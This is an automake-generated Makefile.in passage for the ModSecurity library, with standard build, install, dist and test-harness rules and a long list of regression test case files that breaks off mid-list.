RECURSIVE_TARGETS = all-recursive check-recursive cscopelist-recursive \ ctags-recursive dvi-recursive html-recursive info-recursive \ install-data-recursive install-dvi-recursive \ install-exec-recursive install-html-recursive \ install-info-recursive install-pdf-recursive \ install-ps-recursive install-recursive installcheck-recursive \ installdirs-recursive pdf-recursive ps-recursive \ tags-recursive uninstall-recursive am__can_run_installinfo = \ case $$AM_UPDATE_INFO_DIR in \ n|no|NO) false;; \ *) (install-info --version) >/dev/null 2>&1;; \ esac am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`; am__vpath_adj = case $$p in \ $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \ *) f=$$p;; \ esac; am__strip_dir = f=`echo $$p | sed -e 's|^.*/||'`; am__install_max = 40 am__nobase_strip_setup = \ srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'` am__nobase_strip = \ for p in $$list; do echo "$$p"; done | sed -e "s|$$srcdirstrip/||" am__nobase_list = $(am__nobase_strip_setup); \ for p in $$list; do echo "$$p $$p"; done | \ sed "s| $$srcdirstrip/| |;"' / .*\//!s/ .*/ ./; s,\( .*\)/[^/]*$$,\1,' | \ $(AWK) 'BEGIN { files["."] = "" } { files[$$2] = files[$$2] " " $$1; \ if (++n[$$2] == $(am__install_max)) \ { print $$2, files[$$2]; n[$$2] = 0; files[$$2] = "" } } \ END { for (dir in files) print dir, files[dir] }' am__base_list = \ sed '$$!N;$$!N;$$!N;$$!N;$$!N;$$!N;$$!N;s/\n/ /g' | \ sed '$$!N;$$!N;$$!N;$$!N;s/\n/ /g' am__uninstall_files_from_dir = { \ test -z "$$files" \ || { test ! -d "$$dir" && test ! -f "$$dir" && test ! -r "$$dir"; } \ || { echo " ( cd '$$dir' && rm -f" $$files ")"; \ $(am__cd) "$$dir" && rm -f $$files; }; \ } am__installdirs = "$(DESTDIR)$(pkgconfigdir)" DATA = $(pkgconfig_DATA) RECURSIVE_CLEAN_TARGETS = mostlyclean-recursive clean-recursive \ distclean-recursive maintainer-clean-recursive am__recursive_targets = \ $(RECURSIVE_TARGETS) \ $(RECURSIVE_CLEAN_TARGETS) \ $(am__extra_recursive_targets) AM_RECURSIVE_TARGETS = $(am__recursive_targets:-recursive=) TAGS CTAGS \ cscope check recheck distdir distdir-am dist dist-all \ distcheck am__tagged_files = $(HEADERS) $(SOURCES) $(TAGS_FILES) $(LISP) # Read a list of newline-separated strings from the standard input, # and print each of them once, without duplicates. Input order is # *not* preserved. am__uniquify_input = $(AWK) '\ BEGIN { nonempty = 0; } \ { items[$$0] = 1; nonempty = 1; } \ END { if (nonempty) { for (i in items) print i; }; } \ ' # Make sure the list of sources is unique. This is necessary because, # e.g., the same source file might be shared among _SOURCES variables # for different programs/libraries. am__define_uniq_tagged_files = \ list='$(am__tagged_files)'; \ unique=`for i in $$list; do \ if test -f "$$i"; then echo $$i; else echo $(srcdir)/$$i; fi; \ done | $(am__uniquify_input)` ETAGS = etags CTAGS = ctags CSCOPE = cscope am__tty_colors_dummy = \ mgn= red= grn= lgn= blu= brg= std=; \ am__color_tests=no am__tty_colors = { \ $(am__tty_colors_dummy); \ if test "X$(AM_COLOR_TESTS)" = Xno; then \ am__color_tests=no; \ elif test "X$(AM_COLOR_TESTS)" = Xalways; then \ am__color_tests=yes; \ elif test "X$$TERM" != Xdumb && { test -t 1; } 2>/dev/null; then \ am__color_tests=yes; \ fi; \ if test $$am__color_tests = yes; then \ red=''; \ grn=''; \ lgn=''; \ blu=''; \ mgn=''; \ brg=''; \ std=''; \ fi; \ } am__recheck_rx = ^[ ]*:recheck:[ ]* am__global_test_result_rx = ^[ ]*:global-test-result:[ ]* am__copy_in_global_log_rx = ^[ ]*:copy-in-global-log:[ ]* # A command that, given a newline-separated list of test names on the # standard input, print the name of the tests that are to be re-run # upon "make recheck". am__list_recheck_tests = $(AWK) '{ \ recheck = 1; \ while ((rc = (getline line < ($$0 ".trs"))) != 0) \ { \ if (rc < 0) \ { \ if ((getline line2 < ($$0 ".log")) < 0) \ recheck = 0; \ break; \ } \ else if (line ~ /$(am__recheck_rx)[nN][Oo]/) \ { \ recheck = 0; \ break; \ } \ else if (line ~ /$(am__recheck_rx)[yY][eE][sS]/) \ { \ break; \ } \ }; \ if (recheck) \ print $$0; \ close ($$0 ".trs"); \ close ($$0 ".log"); \ }' # A command that, given a newline-separated list of test names on the # standard input, create the global log from their .trs and .log files. am__create_global_log = $(AWK) ' \ function fatal(msg) \ { \ print "fatal: making $@: " msg | "cat >&2"; \ exit 1; \ } \ function rst_section(header) \ { \ print header; \ len = length(header); \ for (i = 1; i <= len; i = i + 1) \ printf "="; \ printf "\n\n"; \ } \ { \ copy_in_global_log = 1; \ global_test_result = "RUN"; \ while ((rc = (getline line < ($$0 ".trs"))) != 0) \ { \ if (rc < 0) \ fatal("failed to read from " $$0 ".trs"); \ if (line ~ /$(am__global_test_result_rx)/) \ { \ sub("$(am__global_test_result_rx)", "", line); \ sub("[ ]*$$", "", line); \ global_test_result = line; \ } \ else if (line ~ /$(am__copy_in_global_log_rx)[nN][oO]/) \ copy_in_global_log = 0; \ }; \ if (copy_in_global_log) \ { \ rst_section(global_test_result ": " $$0); \ while ((rc = (getline line < ($$0 ".log"))) != 0) \ { \ if (rc < 0) \ fatal("failed to read from " $$0 ".log"); \ print line; \ }; \ printf "\n"; \ }; \ close ($$0 ".trs"); \ close ($$0 ".log"); \ }' # Restructured Text title. am__rst_title = { sed 's/.*/ & /;h;s/./=/g;p;x;s/ *$$//;p;g' && echo; } # Solaris 10 'make', and several other traditional 'make' implementations, # pass "-e" to $(SHELL), and POSIX 2008 even requires this. Work around it # by disabling -e (using the XSI extension "set +e") if it's set. am__sh_e_setup = case $$- in *e*) set +e;; esac # Default flags passed to test drivers. am__common_driver_flags = \ --color-tests "$$am__color_tests" \ --enable-hard-errors "$$am__enable_hard_errors" \ --expect-failure "$$am__expect_failure" # To be inserted before the command running the test. Creates the # directory for the log if needed. Stores in $dir the directory # containing $f, in $tst the test, in $log the log. Executes the # developer- defined test setup AM_TESTS_ENVIRONMENT (if any), and # passes TESTS_ENVIRONMENT. Set up options for the wrapper that # will run the test scripts (or their associated LOG_COMPILER, if # thy have one). am__check_pre = \ $(am__sh_e_setup); \ $(am__vpath_adj_setup) $(am__vpath_adj) \ $(am__tty_colors); \ srcdir=$(srcdir); export srcdir; \ case "$@" in \ */*) am__odir=`echo "./$@" | sed 's|/[^/]*$$||'`;; \ *) am__odir=.;; \ esac; \ test "x$$am__odir" = x"." || test -d "$$am__odir" \ || $(MKDIR_P) "$$am__odir" || exit $$?; \ if test -f "./$$f"; then dir=./; \ elif test -f "$$f"; then dir=; \ else dir="$(srcdir)/"; fi; \ tst=$$dir$$f; log='$@'; \ if test -n '$(DISABLE_HARD_ERRORS)'; then \ am__enable_hard_errors=no; \ else \ am__enable_hard_errors=yes; \ fi; \ case " $(XFAIL_TESTS) " in \ *[\ \ ]$$f[\ \ ]* | *[\ \ ]$$dir$$f[\ \ ]*) \ am__expect_failure=yes;; \ *) \ am__expect_failure=no;; \ esac; \ $(AM_TESTS_ENVIRONMENT) $(TESTS_ENVIRONMENT) # A shell command to get the names of the tests scripts with any registered # extension removed (i.e., equivalently, the names of the test logs, with # the '.log' extension removed). The result is saved in the shell variable # '$bases'. This honors runtime overriding of TESTS and TEST_LOGS. Sadly, # we cannot use something simpler, involving e.g., "$(TEST_LOGS:.log=)", # since that might cause problem with VPATH rewrites for suffix-less tests. # See also 'test-harness-vpath-rewrite.sh' and 'test-trs-basic.sh'. am__set_TESTS_bases = \ bases='$(TEST_LOGS)'; \ bases=`for i in $$bases; do echo $$i; done | sed 's/\.log$$//'`; \ bases=`echo $$bases` RECHECK_LOGS = $(TEST_LOGS) TEST_SUITE_LOG = test-suite.log TEST_EXTENSIONS = @EXEEXT@ .test LOG_COMPILE = $(LOG_COMPILER) $(AM_LOG_FLAGS) $(LOG_FLAGS) am__set_b = \ case '$@' in \ */*) \ case '$*' in \ */*) b='$*';; \ *) b=`echo '$@' | sed 's/\.log$$//'`; \ esac;; \ *) \ b='$*';; \ esac am__test_logs1 = $(TESTS:=.log) am__test_logs2 = $(am__test_logs1:@EXEEXT@.log=.log) TEST_LOGS = $(am__test_logs2:.test.log=.log) TEST_LOG_DRIVER = $(SHELL) $(top_srcdir)/test-driver TEST_LOG_COMPILE = $(TEST_LOG_COMPILER) $(AM_TEST_LOG_FLAGS) \ $(TEST_LOG_FLAGS) DIST_SUBDIRS = $(SUBDIRS) am__DIST_COMMON = $(srcdir)/Makefile.in $(srcdir)/modsecurity.pc.in \ AUTHORS ar-lib compile config.guess config.sub depcomp \ install-sh ltmain.sh missing test-driver ylwrap DISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST) distdir = $(PACKAGE)-$(VERSION) top_distdir = $(distdir) am__remove_distdir = \ if test -d "$(distdir)"; then \ find "$(distdir)" -type d ! -perm -200 -exec chmod u+w {} ';' \ && rm -rf "$(distdir)" \ || { sleep 5 && rm -rf "$(distdir)"; }; \ else :; fi am__post_remove_distdir = $(am__remove_distdir) am__relativize = \ dir0=`pwd`; \ sed_first='s,^\([^/]*\)/.*$$,\1,'; \ sed_rest='s,^[^/]*/*,,'; \ sed_last='s,^.*/\([^/]*\)$$,\1,'; \ sed_butlast='s,/*[^/]*$$,,'; \ while test -n "$$dir1"; do \ first=`echo "$$dir1" | sed -e "$$sed_first"`; \ if test "$$first" != "."; then \ if test "$$first" = ".."; then \ dir2=`echo "$$dir0" | sed -e "$$sed_last"`/"$$dir2"; \ dir0=`echo "$$dir0" | sed -e "$$sed_butlast"`; \ else \ first2=`echo "$$dir2" | sed -e "$$sed_first"`; \ if test "$$first2" = "$$first"; then \ dir2=`echo "$$dir2" | sed -e "$$sed_rest"`; \ else \ dir2="../$$dir2"; \ fi; \ dir0="$$dir0"/"$$first"; \ fi; \ fi; \ dir1=`echo "$$dir1" | sed -e "$$sed_rest"`; \ done; \ reldir="$$dir2" DIST_ARCHIVES = $(distdir).tar.gz GZIP_ENV = --best DIST_TARGETS = dist-gzip distuninstallcheck_listfiles = find . -type f -print am__distuninstallcheck_listfiles = $(distuninstallcheck_listfiles) \ | sed 's|^\./|$(prefix)/|' | grep -v '$(infodir)/dir$$' distcleancheck_listfiles = find . -type f -print ACLOCAL = @ACLOCAL@ AMTAR = @AMTAR@ AM_DEFAULT_VERBOSITY = @AM_DEFAULT_VERBOSITY@ AR = @AR@ AUTOCONF = @AUTOCONF@ AUTOHEADER = @AUTOHEADER@ AUTOMAKE = @AUTOMAKE@ AWK = @AWK@ BISON = @BISON@ CC = @CC@ CCDEPMODE = @CCDEPMODE@ CFLAGS = @CFLAGS@ CPP = @CPP@ CPPFLAGS = @CPPFLAGS@ CURL_CFLAGS = @CURL_CFLAGS@ CURL_CONFIG = @CURL_CONFIG@ CURL_CPPFLAGS = @CURL_CPPFLAGS@ CURL_DISPLAY = @CURL_DISPLAY@ CURL_FOUND = @CURL_FOUND@ CURL_LDADD = @CURL_LDADD@ CURL_LDFLAGS = @CURL_LDFLAGS@ CURL_USES_GNUTLS = @CURL_USES_GNUTLS@ CURL_VERSION = @CURL_VERSION@ CXX = @CXX@ CXXCPP = @CXXCPP@ CXXDEPMODE = @CXXDEPMODE@ CXXFLAGS = @CXXFLAGS@ CYGPATH_W = @CYGPATH_W@ DEFS = @DEFS@ DEPDIR = @DEPDIR@ DLLTOOL = @DLLTOOL@ DOXYGEN_PAPER_SIZE = @DOXYGEN_PAPER_SIZE@ DSYMUTIL = @DSYMUTIL@ DUMPBIN = @DUMPBIN@ DX_CONFIG = @DX_CONFIG@ DX_DOCDIR = @DX_DOCDIR@ DX_DOT = @DX_DOT@ DX_DOXYGEN = @DX_DOXYGEN@ DX_DVIPS = @DX_DVIPS@ DX_EGREP = @DX_EGREP@ DX_ENV = @DX_ENV@ DX_FLAG_chi = @DX_FLAG_chi@ DX_FLAG_chm = @DX_FLAG_chm@ DX_FLAG_doc = @DX_FLAG_doc@ DX_FLAG_dot = @DX_FLAG_dot@ DX_FLAG_html = @DX_FLAG_html@ DX_FLAG_man = @DX_FLAG_man@ DX_FLAG_pdf = @DX_FLAG_pdf@ DX_FLAG_ps = @DX_FLAG_ps@ DX_FLAG_rtf = @DX_FLAG_rtf@ DX_FLAG_xml = @DX_FLAG_xml@ DX_HHC = @DX_HHC@ DX_LATEX = @DX_LATEX@ DX_MAKEINDEX = @DX_MAKEINDEX@ DX_PDFLATEX = @DX_PDFLATEX@ DX_PERL = @DX_PERL@ DX_PROJECT = @DX_PROJECT@ ECHO_C = @ECHO_C@ ECHO_N = @ECHO_N@ ECHO_T = @ECHO_T@ EGREP = @EGREP@ ENABLE_VALGRIND_drd = @ENABLE_VALGRIND_drd@ ENABLE_VALGRIND_helgrind = @ENABLE_VALGRIND_helgrind@ ENABLE_VALGRIND_memcheck = @ENABLE_VALGRIND_memcheck@ ENABLE_VALGRIND_sgcheck = @ENABLE_VALGRIND_sgcheck@ EXEEXT = @EXEEXT@ FGREP = @FGREP@ FLEX = @FLEX@ GEOIP_CFLAGS = @GEOIP_CFLAGS@ GEOIP_DISPLAY = @GEOIP_DISPLAY@ GEOIP_FOUND = @GEOIP_FOUND@ GEOIP_LDADD = @GEOIP_LDADD@ GEOIP_LDFLAGS = @GEOIP_LDFLAGS@ GEOIP_LIBS = @GEOIP_LIBS@ GEOIP_VERSION = @GEOIP_VERSION@ GLOBAL_CFLAGS = @GLOBAL_CFLAGS@ GLOBAL_CPPFLAGS = @GLOBAL_CPPFLAGS@ GLOBAL_LDADD = @GLOBAL_LDADD@ GREP = @GREP@ INSTALL = @INSTALL@ INSTALL_DATA = @INSTALL_DATA@ INSTALL_PROGRAM = @INSTALL_PROGRAM@ INSTALL_SCRIPT = @INSTALL_SCRIPT@ INSTALL_STRIP_PROGRAM = @INSTALL_STRIP_PROGRAM@ LD = @LD@ LDFLAGS = @LDFLAGS@ LEX = @LEX@ LEXLIB = @LEXLIB@ LEX_OUTPUT_ROOT = @LEX_OUTPUT_ROOT@ LIBOBJS = @LIBOBJS@ LIBS = @LIBS@ LIBTOOL = @LIBTOOL@ LIBXML2_CFLAGS = @LIBXML2_CFLAGS@ LIBXML2_CONFIG = @LIBXML2_CONFIG@ LIBXML2_CPPFLAGS = @LIBXML2_CPPFLAGS@ LIBXML2_DISPLAY = @LIBXML2_DISPLAY@ LIBXML2_FOUND = @LIBXML2_FOUND@ LIBXML2_LDADD = @LIBXML2_LDADD@ LIBXML2_LDFLAGS = @LIBXML2_LDFLAGS@ LIBXML2_VERSION = @LIBXML2_VERSION@ LIPO = @LIPO@ LMDB_CFLAGS = @LMDB_CFLAGS@ LMDB_DISPLAY = @LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ SUBDIRS = \ others \ src \ doc \ tools \ $(MAYBE_EXAMPLES) \ $(MAYBE_TEST) # make clean CLEANFILES = ACLOCAL_AMFLAGS = -I build # make maintainer-clean MAINTAINERCLEANFILES = \ aclocal.m4 \ ar-lib \ build/libtool.m4 \ build/lt~obsolete.m4 \ build/ltoptions.m4 \ build/ltsugar.m4 \ build/ltversion.m4 \ coding-style.txt \ compile \ config.guess \ config.sub \ configure \ cppcheck.txt \ depcomp \ install-sh \ ltmain.sh \ Makefile.in \ missing \ test/modsec-shared-collections \ test/modsec-shared-collections-lock \ test-suite-drd.log \ test-suite-helgrind.log \ test-suite-memcheck.log \ ylwrap VALGRIND_SUPPRESSIONS_FILES = valgrind_suppressions.txt LOG_DRIVER = env $(SHELL) $(top_srcdir)/test/custom-test-driver AM_TESTS_ENVIRONMENT = AUTOMAKE_TESTS=true; export AUTOMAKE_TESTS; LOG_COMPILER = test/test-suite.sh # for i in `find test/test-cases -iname *.json`; do echo TESTS+=$i; done TESTS = test/test-cases/regression/action-allow.json \ test/test-cases/regression/action-block.json \ test/test-cases/regression/action-ctl_request_body_access.json \ test/test-cases/regression/action-ctl_request_body_processor.json \ test/test-cases/regression/action-ctl_request_body_processor_urlencoded.json \ test/test-cases/regression/action-ctl_rule_engine.json \ test/test-cases/regression/action-ctl_rule_remove_by_id.json \ test/test-cases/regression/action-ctl_rule_remove_by_tag.json \ test/test-cases/regression/action-ctl_rule_remove_target_by_id.json \ test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json \ test/test-cases/regression/action-disruptive.json \ test/test-cases/regression/action-exec.json \ test/test-cases/regression/action-id.json \ test/test-cases/regression/action-initcol.json \ test/test-cases/regression/action-msg.json \ test/test-cases/regression/action-setenv.json \ test/test-cases/regression/action-setrsc.json \ test/test-cases/regression/action-setsid.json \ test/test-cases/regression/action-setuid.json \ test/test-cases/regression/actions.json \ test/test-cases/regression/action-skip.json \ test/test-cases/regression/action-tag.json \ test/test-cases/regression/action-tnf-base64.json \ test/test-cases/regression/action-xmlns.json \ test/test-cases/regression/auditlog.json \ test/test-cases/regression/collection-case-insensitive.json \ test/test-cases/regression/collection-lua.json \ test/test-cases/regression/collection-regular_expression_selection.json \ test/test-cases/regression/collection-resource.json \ test/test-cases/regression/collection-tx.json \ test/test-cases/regression/collection-tx-with-macro.json \ test/test-cases/regression/config-body_limits.json \ test/test-cases/regression/config-calling_phases_by_name.json \ test/test-cases/regression/config-include-bad.json \ test/test-cases/regression/config-include.json \ test/test-cases/regression/config-remove_by_id.json \ test/test-cases/regression/config-remove_by_msg.json \ test/test-cases/regression/config-remove_by_tag.json \ test/test-cases/regression/config-response_type.json \ test/test-cases/regression/config-secdefaultaction.json \ test/test-cases/regression/config-secremoterules.json \ test/test-cases/regression/config-update-action-by-id.json \ test/test-cases/regression/config-update-target-by-id.json \ test/test-cases/regression/config-update-target-by-msg.json \ test/test-cases/regression/config-update-target-by-tag.json \ test/test-cases/regression/config-xml_external_entity.json \ test/test-cases/regression/debug_log.json \ test/test-cases/regression/directive-sec_rule_script.json \ test/test-cases/regression/issue-1152.json \ test/test-cases/regression/issue-1528.json \ test/test-cases/regression/issue-1565.json \ test/test-cases/regression/issue-1576.json \ test/test-cases/regression/issue-1591.json \ test/test-cases/regression/issue-1725.json \ test/test-cases/regression/issue-1743.json \ test/test-cases/regression/issue-1785.json \ test/test-cases/regression/issue-1812.json \ test/test-cases/regression/issue-1831.json \ test/test-cases/regression/issue-1844.json \ test/test-cases/regression/issue-1850.json \ test/test-cases/regression/issue-1941.json \ test/test-cases/regression/issue-1943.json \ test/test-cases/regression/issue-1956.json \ test/test-cases/regression/issue-1960.json \ test/test-cases/regression/issue-2099.json \ test/test-cases/regression/issue-2111.json \ test/test-cases/regression/issue-394.json \ test/test-cases/regression/issue-849.json \ test/test-cases/regression/issue-960.json \ test/test-cases/regression/misc.json \ test/test-cases/regression/misc-variable-under-quotes.json \ test/test-cases/regression/offset-variable.json \ test/test-cases/regression/operator-detectsqli.json \ test/test-cases/regression/operator-detectxss.json \ test/test-cases/regression/operator-fuzzyhash.json \ test/test-cases/regression/operator-inpectFile.json \ test/test-cases/regression/operator-ipMatchFromFile.json \ test/test-cases/regression/operator-pm.json \ test/test-cases/regression/operator-rx.json \ test/test-cases/regression/operator-UnconditionalMatch.json \ test/test-cases/regression/operator-validate-byte-range.json \ test/test-cases/regression/operator-verifycc.json \ test/test-cases/regression/operator-verifycpf.json \ test/test-cases/regression/operator-verifyssn.json \ test/test-cases/regression/operator-verifysvnr.json \ test/test-cases/regression/request-body-parser-json.json \ test/test-cases/regression/request-body-parser-multipart-crlf.json \ test/test-cases/regression/request-body-parser-multipart.json \ test/test-cases/regression/request-body-parser-xml.json \ test/test-cases/regression/request-body-parser-xml-validade-dtd.json \ test/test-cases/regression/rule-920120.json \ test/test-cases/regression/rule-920200.json \ test/test-cases/regression/rule-920274.json \ test/test-cases/regression/secaction.json \ test/test-cases/regression/sec_component_signature.json \ test/test-cases/regression/secmarker.json \ test/test-cases/regression/secruleengine.json \ test/test-cases/regression/transformation-none.json \ test/test-cases/regression/transformations.json \ test/test-cases/regression/variable-ARGS_COMBINED_SIZE.json \ test/test-cases/regression/variable-ARGS_GET.json \ test/test-cases/regression/variable-ARGS_GET_NAMES.json \ test/test-cases/regression/variable-ARGS.json \ test/test-cases/regression/variable-ARGS_NAMES.json \ test/test-cases/regression/variable-ARGS_POST.json \ test/test-cases/regression/variable-ARGS_POST_NAMES.json \ test/test-cases/regression/variable-AUTH_TYPE.json \ test/test-cases/regression/variable-DURATION.json \ test/test-cases/regression/variable-ENV.json \ test/test-cases/regression/variable-FILES_COMBINED_SIZE.json \ test/test-cases/regression/variable-FILES.json \ test/test-cases/regression/variable-FILES_NAMES.json \ test/test-cases/regression/variable-FILES_SIZES.json \ test/test-cases/regression/variable-FULL_REQUEST.json \ test/test-cases/regression/variable-FULL_REQUEST_LENGTH.json \ test/test-cases/regression/variable-GEO.json \ test/test-cases/regression/variable-HIGHEST_SEVERITY.json \ test/test-cases/regression/variable-INBOUND_DATA_ERROR.json \ test/test-cases/regression/variable-MATCHED_VAR.json \ test/test-cases/regression/variable-MATCHED_VAR_NAME.json \ test/test-cases/regression/variable-MATCHED_VARS.json \ test/test-cases/regression/variable-MATCHED_VARS_NAMES.json \ test/test-cases/regression/variable-MODSEC_BUILD.json \ test/test-cases/regression/variable-MULTIPART_CRLF_LF_LINES.json \ test/test-cases/regression/variable-MULTIPART_FILENAME.json \ test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json \ test/test-cases/regression/variable-MULTIPART_NAME.json \ test/test-cases/regression/variable-MULTIPART_STRICT_ERROR.json \ test/test-cases/regression/variable-MULTIPART_UNMATCHED_BOUNDARY.json \ test/test-cases/regression/variable-OUTBOUND_DATA_ERROR.json \ test/test-cases/regression/variable-PATH_INFO.json \ test/test-cases/regression/variable-QUERY_STRING.json \ test/test-cases/regression/variable-REMOTE_ADDR.json \ test/test-cases/regression/variable-REMOTE_HOST.json \ test/test-cases/regression/variable-REMOTE_PORT.json \ test/test-cases/regression/variable-REMOTE_USER.json \ test/test-cases/regression/variable-REQBODY_PROCESSOR_ERROR.json \ test/test-cases/regression/variable-REQBODY_PROCESSOR.json \ test/test-cases/regression/variable-REQUEST_BASENAME.json \ test/test-cases/regression/variable-REQUEST_BODY.json \ test/test-cases/regression/variable-REQUEST_BODY_LENGTH.json \ test/test-cases/regression/variable-REQUEST_COOKIES.json \ test/test-cases/regression/variable-REQUEST_COOKIES_NAMES.json \ test/test-cases/regression/variable-REQUEST_FILENAME.json \ test/test-cases/regression/variable-REQUEST_HEADERS.json \ test/test-cases/regression/variable-REQUEST_HEADERS_NAMES.json \ test/test-cases/regression/variable-REQUEST_LINE.json \ test/test-cases/regression/variable-REQUEST_METHOD.json \ test/test-cases/regression/variable-REQUEST_PROTOCOL.json \ test/test-cases/regression/variable-REQUEST_URI.json \ test/test-cases/regression/variable-REQUEST_URI_RAW.json \ test/test-cases/regression/variable-RESPONSE_BODY.json \ test/test-cases/regression/variable-RESPONSE_CONTENT_LENGTH.json \ test/test-cases/regression/variable-RESPONSE_CONTENT_TYPE.json \ test/test-cases/regression/variable-RESPONSE_HEADERS.json \ test/test-cases/regression/variable-RESPONSE_HEADERS_NAMES.json \ test/test-cases/regression/variable-RESPONSE_PROTOCOL.json \ test/test-cases/regression/variable-RULE.json \ test/test-cases/regression/variable-SERVER_ADDR.json \ test/test-cases/regression/variable-SERVER_NAME.json \ test/test-cases/regression/variable-SERVER_PORT.json \ test/test-cases/regression/variable-SESSIONID.json \ test/test-cases/regression/variable-STATUS.json \ test/test-cases/regression/variable-TIME_DAY.json \ test/test-cases/regression/variable-TIME_EPOCH.json \ test/test-cases/regression/variable-TIME_HOUR.json \ test/test-cases/regression/variable-TIME.json \ test/test-cases/regression/variable-TIME_MIN.json \ test/test-cases/regression/variable-TIME_MON.json \ test/test-cases/regression/variable-TIME_SEC.json \ test/test-cases/regression/variable-TIME_WDAY.json \ test/test-cases/regression/variable-TIME_YEAR.json \ test/test-cases/regression/variable-TX.json \ test/test-cases/regression/variable-UNIQUE_ID.json \ test/test-cases/regression/variable-URLENCODED_ERROR.json \ test/test-cases/regression/variable-USERID.json \ test/test-cases/regression/variable-variation-count.json \ test/test-cases/regression/variable-variation-exclusion.json \ test/test-cases/regression/variable-WEBAPPID.json \ test/test-cases/regression/variable-WEBSERVER_ERROR_LOG.json \ test/test-cases/secrules-language-tests/operators/beginsWith.json \ test/test-cases/secrules-language-tests/operators/contains.json \ test/test-cases/secrules-language-tests/operators/containsWord.json \ test/test-cases/secrules-language-tests/operators/detectSQLi.json \ 